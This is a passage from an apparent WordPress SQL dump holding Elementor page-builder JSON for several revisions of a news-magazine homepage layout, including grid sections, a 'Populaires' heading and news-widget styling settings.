",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.1},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1349,474,'_elementor_version','0.4'),(1350,475,'_elementor_edit_mode','builder'),(1351,475,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1352,475,'_elementor_version','0.4'),(1353,476,'_elementor_edit_mode','builder'),(1354,476,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\